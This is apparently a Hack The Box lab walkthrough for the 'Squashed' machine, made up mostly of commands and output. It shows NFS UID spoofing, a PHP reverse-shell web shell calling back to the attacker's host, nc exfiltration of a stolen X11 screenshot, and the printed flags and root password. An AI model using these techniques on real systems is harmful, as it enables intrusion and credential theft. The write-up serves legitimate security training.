Squashed
Wed, 23 October 2024
Platform: Hack The Box
sudo nmap 10.10.11.191 -sV -Pn -r -g53 -D 1.1.1.1 -p- --min-rate=3000 -sC
Nmap scan report for 10.10.11.191
Host is up (0.064s latency).
Not shown: 65527 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Built Better
|_http-server-header: Apache/2.4.41 (Ubuntu)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 33604/udp6 mountd
| 100005 1,2,3 33823/tcp mountd
| 100005 1,2,3 42949/tcp6 mountd
| 100005 1,2,3 45740/udp mountd
| 100021 1,3,4 39767/tcp6 nlockmgr
| 100021 1,3,4 45651/tcp nlockmgr
| 100021 1,3,4 46474/udp6 nlockmgr
| 100021 1,3,4 54048/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
2049/tcp open nfs 3-4 (RPC #100003)
33823/tcp open mountd 1-3 (RPC #100005)
36799/tcp open mountd 1-3 (RPC #100005)
45651/tcp open nlockmgr 1-4 (RPC #100021)
51125/tcp open mountd 1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
showmount -e 10.10.11.191
Export list for 10.10.11.191:
/home/ross *
/var/www/html *
sudo mkdir /mnt/ross
sudo mkdir /mnt/html
sudo mount -t nfs 10.10.11.191:/home/ross /mnt/ross -o nolock
sudo mount -t nfs 10.10.11.191:/var/www/html /mnt/html -o nolock
cd /mnt/nfs
ls
Desktop Documents Downloads Music Pictures Public Templates Videos
tree -apug /mnt/ross
[drwxr-xr-x 1001 1001 ] /mnt/ross
├── [-rw------- 1001 1001 ] .Xauthority
├── [lrwxrwxrwx root root ] .bash_history -> /dev/null
├── [drwx------ 1001 1001 ] .cache [error opening dir]
├── [drwx------ 1001 1001 ] .config [error opening dir]
├── [drwx------ 1001 1001 ] .gnupg [error opening dir]
├── [drwx------ 1001 1001 ] .local [error opening dir]
├── [lrwxrwxrwx root root ] .viminfo -> /dev/null
├── [-rw------- 1001 1001 ] .xsession-errors
├── [-rw------- 1001 1001 ] .xsession-errors.old
├── [drwxr-xr-x 1001 1001 ] Desktop
├── [drwxr-xr-x 1001 1001 ] Documents
│ └── [-rw-rw-r-- 1001 1001 ] Passwords.kdbx
├── [drwxr-xr-x 1001 1001 ] Downloads
├── [drwxr-xr-x 1001 1001 ] Music
├── [drwxr-xr-x 1001 1001 ] Pictures
├── [drwxr-xr-x 1001 1001 ] Public
├── [drwxr-xr-x 1001 1001 ] Templates
└── [drwxr-xr-x 1001 1001 ] Videos
13 directories, 6 files
tree -apug /mnt/html
[drwxr-xr-- 2017 www-data] /mnt/html
sudo useradd mountuser
sudo usermod -u 1001 -g www-data mountuser
tree -apug /mnt/ross
[drwxr-xr-x mountuser mountuser] /mnt/ross
├── [-rw------- mountuser mountuser] .Xauthority
├── [lrwxrwxrwx root root ] .bash_history -> /dev/null
├── [drwx------ mountuser mountuser] .cache [error opening dir]
├── [drwx------ mountuser mountuser] .config [error opening dir]
├── [drwx------ mountuser mountuser] .gnupg [error opening dir]
├── [drwx------ mountuser mountuser] .local [error opening dir]
├── [lrwxrwxrwx root root ] .viminfo -> /dev/null
├── [-rw------- mountuser mountuser] .xsession-errors
├── [-rw------- mountuser mountuser] .xsession-errors.old
├── [drwxr-xr-x mountuser mountuser] Desktop
├── [drwxr-xr-x mountuser mountuser] Documents
│ └── [-rw-rw-r-- mountuser mountuser] Passwords.kdbx
├── [drwxr-xr-x mountuser mountuser] Downloads
├── [drwxr-xr-x mountuser mountuser] Music
├── [drwxr-xr-x mountuser mountuser] Pictures
├── [drwxr-xr-x mountuser mountuser] Public
├── [drwxr-xr-x mountuser mountuser] Templates
└── [drwxr-xr-x mountuser mountuser] Videos
tree -apug /mnt/html
[drwxr-xr-- 2017 www-data] /mnt/html
sudo usermod -u 2017 -g www-data mountuser
sudo su mountuser -c bash
cd /mnt/html
tree -apug
[drwxr-xr-- mountuser www-data] .
├── [-rw-r--r-- mountuser www-data] .htaccess
├── [drwxr-xr-x mountuser www-data] css
│ ├── [-rwxr-xr-x mountuser www-data] .DS_Store
│ ├── [-rwxr-xr-x mountuser www-data] animate.min.css
│ ├── [-rwxr-xr-x mountuser www-data] bootstrap-grid.css
│ ├── [-rwxr-xr-x mountuser www-data] bootstrap-grid.css.map
│ ├── [-rwxr-xr-x mountuser www-data] bootstrap-grid.min.css
│ ├── [-rwxr-xr-x mountuser www-data] bootstrap-grid.min.css.map
│ ├── [-rwxr-xr-x mountuser www-data] bootstrap-reboot.css
│ ├── [-rwxr-xr-x mountuser www-data] bootstrap-reboot.css.map
│ ├── [-rwxr-xr-x mountuser www-data] bootstrap-reboot.min.css
│ ├── [-rwxr-xr-x mountuser www-data] bootstrap-reboot.min.css.map
│ ├── [-rwxr-xr-x mountuser www-data] bootstrap.css
│ ├── [-rwxr-xr-x mountuser www-data] bootstrap.css.map
│ ├── [-rwxr-xr-x mountuser www-data] bootstrap.min.css
│ ├── [-rwxr-xr-x mountuser www-data] bootstrap.min.css.map
│ ├── [-rwxr-xr-x mountuser www-data] default-skin.css
│ ├── [-rwxr-xr-x mountuser www-data] font-awesome.min.css
│ ├── [-rwxr-xr-x mountuser www-data] icomoon.css
│ ├── [-rwxr-xr-x mountuser www-data] jquery-ui.css
│ ├── [-rwxr-xr-x mountuser www-data] jquery.fancybox.min.css
│ ├── [-rwxr-xr-x mountuser www-data] jquery.mCustomScrollbar.min.css
│ ├── [-rwxr-xr-x mountuser www-data] meanmenu.css
│ ├── [-rwxr-xr-x mountuser www-data] nice-select.css
│ ├── [-rwxr-xr-x mountuser www-data] normalize.css
│ ├── [-rwxr-xr-x mountuser www-data] owl.carousel.min.css
│ ├── [-rwxr-xr-x mountuser www-data] responsive.css
│ ├── [-rwxr-xr-x mountuser www-data] slick.css
│ └── [-rwxr-xr-x mountuser www-data] style.css
├── [drwxr-xr-x mountuser www-data] images
│ ├── [-rwxr-xr-x mountuser www-data] banner-bg.png
│ ├── [-rwxr-xr-x mountuser www-data] bg-1.png
│ ├── [-rwxr-xr-x mountuser www-data] contact-bg.png
│ ├── [-rwxr-xr-x mountuser www-data] fb-icon.png
│ ├── [-rwxr-xr-x mountuser www-data] footer-logo.png
│ ├── [-rwxr-xr-x mountuser www-data] header-bg.png
│ ├── [-rwxr-xr-x mountuser www-data] icon-1.png
│ ├── [-rwxr-xr-x mountuser www-data] icon-2.png
│ ├── [-rwxr-xr-x mountuser www-data] icon-3.png
│ ├── [-rwxr-xr-x mountuser www-data] icon-4.png
│ ├── [-rwxr-xr-x mountuser www-data] img-1.png
│ ├── [-rwxr-xr-x mountuser www-data] img-2.png
│ ├── [-rwxr-xr-x mountuser www-data] img-3.png
│ ├── [-rwxr-xr-x mountuser www-data] img-4.png
│ ├── [-rwxr-xr-x mountuser www-data] img-5.png
│ ├── [-rwxr-xr-x mountuser www-data] img-6.png
│ ├── [-rwxr-xr-x mountuser www-data] img-7.png
│ ├── [-rwxr-xr-x mountuser www-data] img-8.png
│ ├── [-rwxr-xr-x mountuser www-data] img-9.png
│ ├── [-rwxr-xr-x mountuser www-data] instagram-icon.png
│ ├── [-rwxr-xr-x mountuser www-data] left-arrow.png
│ ├── [-rwxr-xr-x mountuser www-data] linkedin-icon.png
│ ├── [-rwxr-xr-x mountuser www-data] logo.png
│ ├── [-rwxr-xr-x mountuser www-data] quote-icon.png
│ ├── [-rwxr-xr-x mountuser www-data] right-arrow.png
│ ├── [-rwxr-xr-x mountuser www-data] search-icon.png
│ └── [-rwxr-xr-x mountuser www-data] twitter-icon.png
├── [-rw-r----- mountuser www-data] index.html
└── [drwxr-xr-x mountuser www-data] js
├── [-rwxr-xr-x mountuser www-data] bootstrap.bundle.min.js
├── [-rwxr-xr-x mountuser www-data] custom.js
├── [-rwxr-xr-x mountuser www-data] jquery-3.0.0.min.js
├── [-rwxr-xr-x mountuser www-data] jquery.mCustomScrollbar.concat.min.js
├── [-rwxr-xr-x mountuser www-data] jquery.min.js
├── [-rwxr-xr-x mountuser www-data] plugin.js
└── [-rwxr-xr-x mountuser www-data] popper.min.js
file Passwords.kdbx
Passwords.kdbx: Keepass password database 2.x KDBX
locate 2john | grep 'keepass'
/usr/sbin/keepass2john
keepass2john -h
Usage: keepass2john [-k <keyfile>] <.kdbx database(s)>
keepass2john Passwords.kdbx
! Passwords.kdbx : File version '40000' is currently not supported!
ls -la
total 56
drwxr-xr-- 5 mountuser www-data 4096 Oct 22 23:30 .
drwxr-xr-x 7 root root 4096 Oct 22 23:04 ..
-rw-r--r-- 1 mountuser www-data 44 Oct 21 2022 .htaccess
drwxr-xr-x 2 mountuser www-data 4096 Oct 22 23:30 css
drwxr-xr-x 2 mountuser www-data 4096 Oct 22 23:30 images
-rw-r----- 1 mountuser www-data 32532 Oct 22 23:30 index.html
drwxr-xr-x 2 mountuser www-data 4096 Oct 22 23:30 js
nano shell.php
<?php
$lhost = "10.10.16.7";
$lport = 4435;
exec("bash -c 'bash -i >& /dev/tcp/$lhost/$lport 0>&1'");
$sock = fsockopen($lhost, $lport);
if ($sock) {
exec("sh <&3 >&3 2>&3");
}
?>
curl http://10.10.11.191/shell.php
nc -lvnp 4435
Listening on 0.0.0.0 4435
Connection received on 10.10.11.191 48450
id
uid=2017(alex) gid=2017(alex) groups=2017(alex)
cat /home/alex/user.txt
c52a86aa52d8fcb98d745aaadeb7beae
[*] Linpeas...
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 0.0.0.0:33823 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:36799 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:2049 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:45651 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:51125 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN -
tcp6 0 0 :::2049 :::* LISTEN -
tcp6 0 0 :::42949 :::* LISTEN -
tcp6 0 0 :::32875 :::* LISTEN -
tcp6 0 0 :::111 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::35443 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::39767 :::* LISTEN -
tcp6 0 0 ::1:631 :::* LISTEN -
╔══════════╣ Users with console
alex:x:2017:2017::/home/alex:/bin/bash
root:x:0:0:root:/root:/bin/bash
ross:x:1001:1001::/home/ross:/bin/sh
╔══════════╣ Analyzing Keepass Files (limit 70)
-rw-rw-r-- 1 ross ross 1365 Oct 19 2022 /home/ross/Documents/Passwords.kdbx
╔══════════╣ Analyzing X11 Files (limit 70)
-rw------- 1 ross ross 57 Oct 21 18:28 /home/ross/.Xauthority
╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
Group alex:
/var/translations
/var/images
/var/images/pull_images.sh
╔══════════╣ Files inside others home (limit 20)
/home/ross/.xsession-errors.old
/home/ross/Documents/Passwords.kdbx
/home/ross/.xsession-errors
/home/ross/.Xauthority
w
22:54:57 up 1 day, 4:26, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
ross tty7 :0 Mon18 28:26m 1:27 0.03s /usr/libexec/gnome-session-binary --systemd --session=gnome
sudo pkill -u mountuser
sudo usermod -u 1001 -g www-data mountuser
sudo su mountuser -c bash
cd /mnt/ross
cp .Xauthority /dev/shm
sudo pkill -u mountuser
sudo usermod -u 2017 -g www-data mountuser
curl 10.10.16.7:8000/.Xauthority -o /dev/shm/.Xauthority
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.11.191 - - [23/Oct/2024 00:42:03] "GET /.Xauthority HTTP/1.1" 200 -
export HOME=/home/alex
cp /dev/shm/.Xauthority /home/alex
w
22:54:57 up 1 day, 4:26, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
ross tty7 :0 Mon18 28:26m 1:27 0.03s /usr/libexec/gnome-session-binary --systemd --session=gnome
xwininfo -root -tree -display :0
xwininfo: Window id: 0x533 (the root window) (has no name)
Root window id: 0x533 (the root window) (has no name)
Parent window id: 0x0 (none)
26 children:
0x80000b "gnome-shell": ("gnome-shell" "Gnome-shell") 1x1+-200+-200 +-200+-200
1 child:
0x80000c (has no name): () 1x1+-1+-1 +-201+-201
0x800021 (has no name): () 802x575+-1+26 +-1+26
1 child:
0x1e00006 "Passwords - KeePassXC": ("keepassxc" "keepassxc") 800x536+1+38 +0+64
1 child:
0x1e000fe "Qt NET_WM User Time Window": () 1x1+-1+-1 +-1+63
0x1e00008 "Qt Client Leader Window": () 1x1+0+0 +0+0
0x800017 (has no name): () 1x1+-1+-1 +-1+-1
0x2000001 "keepassxc": ("keepassxc" "Keepassxc") 10x10+10+10 +10+10...
xwd -root -screen -silent -display :0 > screenshot.xwd
cat screenshot.xwd | nc 10.10.16.7 4435
nc -lvnp 4436 > screenshot.xwd
Listening on 0.0.0.0 4436
Connection received on 10.10.11.191 32814
ls
screenshot.xwd
convert screenshot.xwd screenshot.png
[*] Password is visible in screenshot...
cah$mei7rai9A
root:cah$mei7rai9A
su root
Password: cah$mei7rai9A
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
8f019ca9673d58592fbdf31f309dd1c1